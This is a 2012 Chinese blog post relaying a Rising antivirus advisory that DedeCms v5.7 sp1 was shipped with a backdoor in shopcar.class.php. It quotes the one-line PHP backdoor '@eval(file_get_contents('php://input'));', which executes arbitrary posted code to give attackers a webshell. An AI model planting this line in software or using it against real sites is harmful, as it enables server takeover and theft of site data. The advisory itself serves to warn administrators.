东莞长安哪里培训网络营销

让小郭震惊:织梦CMS(DedeCms)v5.7 sp1版本被发现植入后门

最近很多的网站被发现挂马,修补无任何作用.今天再次爆出织梦重大漏洞消息!

据瑞星专家介绍,织梦CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后门代码“@eval(file_get_contents('php://input'));”。通过利用这个后门,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限。

瑞星公司今日对外发布紧急警示:国内知名的PHP开源网站管理系统——织梦CMS(DedeCms)v5.7 sp1版本被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。据CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。瑞星公司特此紧急提醒使用该系统的网站管理员,使用瑞星网站密码安全检测系统查找后门并及时进行封堵。

 

CMS中被植入的后门代码

在黑客攻陷网站后,便可以直接访问服务器上的文件、数据库等信息。目前我国有大量网站采用该系统,此后门或将导致大量用户的信息泄露,造成极为严重的影响。

针对此后门事件,瑞星对其网站密码安全检测系统(http://union.rising.com.cn/)进行了紧急升级,各位网管可使用该系统对自己的网站进行安全扫描,并免费获得瑞星针对此后门的修补建议。

分享到: QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
前一篇:如何解决海蜘蛛免费版弹广告问题,如何让海蜘蛛路由广告拦截 后一篇:电子商务部助理小唐试用期工作体会与计划
标签:织梦漏洞织梦后门
分类:生活趣事| 发布:小郭| 查看: | 发表时间:2012-3-22
原创文章如转载,请注明:转载自东莞电子商务 http://www.gdhaoyou.com/
本文链接:http://www.gdhaoyou.com/post/dede.html

相关文章

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。